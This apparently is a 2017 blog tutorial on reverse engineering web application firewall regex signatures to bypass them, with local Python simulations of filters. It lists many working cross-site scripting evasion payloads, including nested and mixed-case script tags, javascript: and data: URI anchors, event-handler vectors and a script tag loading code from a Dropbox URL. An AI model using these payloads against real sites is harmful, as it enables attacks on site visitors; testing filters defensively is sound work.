How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing

May 25, 2017

What is Regular Expression Reversing (Reg-ex Reversing)?

Strong web application firewalls (WAFs) used by large enterprises can typically resist bypass techniques such as brute forcing, which revolves around throwing arbitrary payloads at the WAF to test its strength and configuration.

Hence, there is a need to use another technique to bypass the WAFs.

This technique, known as Regular Expression Reversing (Regex Reversing), exploits the fact that a WAF compares incoming payloads against the signatures stored in its database. The signatures are usually complex regular expressions.

Picture Me (Sunny) In This Imaginary Scenario

To simplify the matter, picture me in this fictitious and highly entertaining scenario:

Sunny casually launches attacks on a Forbes 50 website shielded by an extremely overpriced and sensitive Web Application Firewall, employing various attack payloads.

If a payload matches a regex signature, the WAF responds; if it does not match, the WAF stays silent.

Sunny takes a good chunk of time out of his life and focuses his energy on reversing the WAF’s signatures.

Sunny eventually grasps what the Web Application Firewall has been programmed to block. With this familiarity, Sunny crafts a malicious payload that bypasses the WAF with ease.

Why Is Reverse Engineering A Web Application Firewall The Best Way To Bypass It?

Okay, so I hope you enjoyed that little skit.

Anyways, Regular Expression Reversing is a very powerful technique for bypassing WAFs. With this method, we are essentially reverse engineering a WAF’s signatures to understand what it is currently blocking. Once we have established a list of the inputs that the WAF blocks, we use this understanding to build a bypass.
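As a rough illustration of the idea, the sketch below simulates a WAF locally with a single made-up signature and records which probe strings it blocks. The signature, the `waf_blocks` function, and the probe list are all assumptions invented for this demo; a real WAF has many signatures and can only be observed through its responses.

```python
import re

# Hypothetical signature, invented for this demo; real WAF rules are not public.
SIGNATURE = re.compile(r"<script[^>]*>", re.IGNORECASE)

def waf_blocks(payload: str) -> bool:
    """Stand-in for 'send the payload and see whether the WAF reacts'."""
    return SIGNATURE.search(payload) is not None

# Harmless probes that vary one detail at a time.
probes = ["<b>", "<script>", "<sCrIpT>", "<script src=x>", "<scr ipt>", "<svg>"]

blocked = [p for p in probes if waf_blocks(p)]
allowed = [p for p in probes if not waf_blocks(p)]

print("blocked:", blocked)
print("allowed:", allowed)
```

Comparing the two lists is what tells us the shape of the signature: here, case does not matter and attributes do not matter, but a space inside the tag name is enough to slip past.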

Of course, this method is not perfect and has failed at times. If we really needed to defeat the WAF in those cases, we would have to go further and turn to exploiting browser bugs, which requires a high degree of skill and mastery to execute properly.

But for purposes of this article, we will focus exclusively on Regular Expression Reversing.

Using Harmless HTML Tags For Testing Purposes

What we need to do first is inject harmless HTML tags like <b>, <br>, and <i> to check whether the firewall filter is blocking the < and > brackets.

It is important to examine the response after we have injected the code. This response can vary, since filters differ drastically from one another.

We have to ask whether the < and > characters are being stripped or HTML encoded, and whether just one of < or > is being stripped or both.
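The questions above can be sketched as a small classifier. This is only a minimal example: the function name `classify_reflection` and the marker string `sunny123` are made up for illustration, and it assumes you already have the response body as a string from a test you are authorized to run.

```python
import html

def classify_reflection(response_body: str, marker: str = "sunny123") -> str:
    """Guess how a filter treated the harmless probe <b>marker</b>."""
    probe = f"<b>{marker}</b>"
    if probe in response_body:
        return "reflected unchanged"
    if html.escape(probe) in response_body:
        return "HTML encoded"
    if probe.replace("<", "") in response_body:
        return "only < stripped"
    if probe.replace(">", "") in response_body:
        return "only > stripped"
    if marker in response_body:
        return "both brackets stripped"
    return "removed or blocked"

# Example: a page that echoed the probe with entities instead of brackets.
print(classify_reflection("<p>You searched for &lt;b&gt;sunny123&lt;/b&gt;</p>"))
```

Using a unique marker inside the tag makes it possible to tell "the brackets were stripped" apart from "the whole input was dropped".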

If you discover that the firewall filter is blocking or stripping both brackets, check whether the filter decodes encoded forms of them, such as HTML entities.

In such a scenario, inject the following:

\u003cb\u003e

&lt;b&gt;

\x3cb\x3e
----------------------

Pay attention to the response and determine whether the firewall filter decodes the entities back to their original form.
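To make "decoding" concrete, here is a minimal sketch showing that all three probes above are just different spellings of `<b>`. The helper `decode_js_escapes` is a hypothetical name written for this example; it handles only the `\uXXXX` and `\xXX` forms used above.

```python
import html
import re

def decode_js_escapes(text: str) -> str:
    """Decode \\uXXXX and \\xXX escape sequences into characters."""
    text = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    return text

probes = [r"\u003cb\u003e", "&lt;b&gt;", r"\x3cb\x3e"]

# Apply both decoders; each probe only needs one of them.
decoded = [html.unescape(decode_js_escapes(p)) for p in probes]

for raw, plain in zip(probes, decoded):
    print(f"{raw!r} -> {plain!r}")
```

If the page comes back containing a literal `<b>` after one of these encoded forms was sent, something between the request and the response is performing a decoding step like this.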

If you notice that the filter is not doing that, then it is a good idea to move on and experiment with the following:

Injection Using The Common Method Of A Script Tag

A <script> tag is the most well-known method for injecting JavaScript.

Keep in mind that a signature for it is one of the first that a WAF vendor creates. Therefore, the chances of discovering a bypass against a well-established firewall filter are going to be quite low.

The following variations are worth experimenting with:

<sCrIPt>alert(1);</sCriPT>

<script%20src="//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">


<svg><script>alert&DiacriticalGrave;1&DiacriticalGrave;<p>

<svg><script>alert&grave;1&grave;<p>


"><svg><script>alert`1`
<script
Confirm(1);</script>

<SCriPt>delete alert;alert(1)</sCriPt>
--------------
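To see why these variations are worth trying, the sketch below runs three of the payloads above against three made-up signatures of increasing strictness. The signature names and patterns are assumptions for illustration only, not rules from any real WAF.

```python
import re

# Hypothetical signatures, from weakest to strongest.
signatures = {
    "naive": re.compile(r"<script>"),
    "nocase": re.compile(r"<script>", re.IGNORECASE),
    "loose": re.compile(r"<script[^>]*>", re.IGNORECASE),
}

payloads = [
    "<sCrIPt>alert(1);</sCriPT>",
    '<script%20src="//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">',
    "<SCriPt>delete alert;alert(1)</sCriPt>",
]

# For each signature, list the payloads it would catch.
results = {
    name: [p for p in payloads if pattern.search(p)]
    for name, pattern in signatures.items()
}

for name, caught in results.items():
    print(f"{name}: caught {len(caught)} of {len(payloads)}")
```

Each variation probes one assumption baked into the signature: case sensitivity, or the expectation that `>` follows the tag name immediately.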

Recursive filters

There may be instances where you face a filter that strips tags like <script> and <iframe> without re-checking its own output.

If you do happen to experience this, the code below will likely defeat the filter:

<scr<script>ipt>alert(1)</scr<script>ipt>

------------
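A minimal sketch of what is going on, assuming a filter that removes `<script>` and `</script>` with a regular expression. The functions `strip_once` and `strip_until_stable` are hypothetical names for this example.

```python
import re

TAG = re.compile(r"</?script>", re.IGNORECASE)

def strip_once(text: str) -> str:
    """Single pass: remove every match found in the ORIGINAL input."""
    return TAG.sub("", text)

def strip_until_stable(text: str) -> str:
    """Recursive variant: repeat until a pass changes nothing."""
    previous = None
    while previous != text:
        previous = text
        text = TAG.sub("", text)
    return text

payload = "<scr<script>ipt>alert(1)</scr<script>ipt>"

print(strip_once(payload))          # the tag is reassembled
print(strip_until_stable(payload))  # no script tag survives
```

The single pass deletes the inner `<script>`, and the leftover halves `<scr` and `ipt>` close up into a fresh tag that the filter never looks at again.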

Flaws With Data Sanitization

Even when the word “script” is stripped from every input, the following payload illustrates how a malicious actor can use the stripping itself to his advantage:

/?param="%3c%cscripscriptt+src%3d/site/a.js%3e

As you can see, the payload includes the blacklisted word “script”. The filter removes one occurrence of “script” from the payload. This closes the gap between “scrip” and “t”, which reassembles the blacklisted word.

In other words, the filter removes one copy of the blacklisted word while leaving another intact in its output.

The same applies to a filter that strips SQL keywords such as “SELECT” and “UNION” in the expectation that, even if a SQL injection flaw is found, the malicious actor will be unable to exploit it to its full potential. This mindset relies on substandard countermeasures: blocking vulnerabilities is significantly different from fixing them.

Removing one prohibited word while leaving the other intact simply shows that the filter has failed to apply its blacklist recursively.
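Here is a small sketch of that failure, using plain string replacement as a stand-in for the filter. The function `strip_keywords_once` is a made-up name, and the nested SQL strings are illustrative inputs that follow the same pattern as “scripscriptt”.

```python
def strip_keywords_once(text: str, blacklist: list[str]) -> str:
    """Remove each blacklisted word once over, without re-checking the result."""
    for word in blacklist:
        text = text.replace(word, "")
    return text

html_result = strip_keywords_once("scripscriptt", ["script"])
sql_result = strip_keywords_once("UNUNIONION SELSELECTECT", ["SELECT", "UNION"])

print(html_result)
print(sql_result)
```

In both cases the output contains exactly the word the filter was supposed to remove, because the blacklisted word was nested inside a second copy of itself.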

As I have demonstrated in this section, it is always a better idea to fix the underlying vulnerability than to attempt to outwit a resolute adversary.
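For contrast, here is a minimal sketch of fixing rather than blocking: encoding user input at output time instead of trying to strip bad words from it. The function `render_comment` is a hypothetical example, and it assumes the value is placed in an HTML body context; other contexts (JavaScript, URLs, CSS) need their own encoding.

```python
import html

def render_comment(user_input: str) -> str:
    """Place untrusted text inside a paragraph with HTML metacharacters encoded."""
    return f"<p>{html.escape(user_input, quote=True)}</p>"

rendered = render_comment("<scr<script>ipt>alert(1)</scr<script>ipt>")
print(rendered)
```

Nothing is removed, so there is nothing for the payload to reassemble; the brackets simply arrive in the browser as text.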

Use other tags

If <script> and </script> are being blocked with whitespaces, the above will be concatenated. This creates a valid JavaScript syntax which permits you to bypass the filter restrictions.

If the filter has implemented stringent rules against <script>, then we should turn to another tag, such as the anchor <a>.

Start with the following attack vector:

<a href="http://www.google.ca">OwnedBySunny</a>

------------

If <a> and “href” were not stripped out, proceed using the code below:

<a href="javascript:">OwnedBySunny</a>

------------

If the “javascript” keyword and “:” were not stripped, use the following:

<a href="javasCripT:alert(1)">OwnedBySunny</a>

------------

If the “javascript” keyword and parentheses are being filtered by the WAF, use the following payload, which URL-encodes the parentheses, to get past the filter:

<a href='javascript:http://@cc_on/confirm%28location%29'>OwnedBySunny</a>

-----------

Also, use the following payload:

<a href="data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt">OwnedBySunny<test>

------------
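To illustrate why entity-encoded payloads like the data: URI above can get past a signature, the sketch below checks a made-up signature against the attribute value before and after entity decoding. The `SIGNATURE` pattern is an assumption for this demo; Python’s `html.unescape` is used only as a stand-in for the decoding a browser performs on attribute values.

```python
import html
import re

# Hypothetical signature that looks for the start of a script tag.
SIGNATURE = re.compile(r"<script", re.IGNORECASE)

attr_value = "data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt"

# What a filter sees if it matches the raw bytes of the request.
raw_hit = SIGNATURE.search(attr_value) is not None

# What is left once named character references are decoded.
decoded = html.unescape(attr_value)
decoded_hit = SIGNATURE.search(decoded) is not None

print("raw match:", raw_hit)
print("decoded value:", decoded)
print("decoded match:", decoded_hit)
```

A filter that matches only the raw value never sees a `<script` string at all, which is why normalizing input before matching matters on the defensive side.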

I could keep going and going with attack vectors. But I feel that I’ve covered enough and will conclude with a few exceptional payloads that can evade filter detection:

"><p id=""onmouseover=\u0070rompt(1) //

<q/oncut=alert(1)>

<form oninput=alert(1)></input></form>

<body/onhashchange=alert(1)><a href=#>ownedbysunny
